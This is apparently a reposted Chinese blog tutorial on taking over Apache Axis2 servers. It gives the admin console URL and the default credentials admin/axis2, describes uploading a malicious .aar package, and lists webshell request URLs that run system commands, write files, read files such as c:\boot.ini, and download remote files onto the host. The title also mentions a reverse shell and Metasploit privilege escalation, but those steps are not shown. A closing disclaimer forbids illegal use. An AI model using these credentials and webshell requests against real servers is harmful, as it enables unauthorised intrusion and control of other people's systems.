Axis2預設弱口令後臺Getshell+windows反彈webshell+metasploit提權
阿新 • • 發佈:2020-12-17
上傳aar包獲取webshell
- 預設弱口令進入axis2控制檯
http://ip:port/axis2/axis2-admin/login
預設口令密碼
admin
axis2
- aar包,使用方法
下載地址
支援的命令? exec-執行命令,在Linux / Windows上均可使用,不用擔心。 http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C: 寫-寫檔案 http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123 info-顯示某些資訊,根據需要進行修改 http://192.168.56.103:8080/axis2/services/AxisInvoker/info 讀取-讀取檔案內容 http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini 下載-下載檔案並將其儲存在某處 http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt
宣告
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!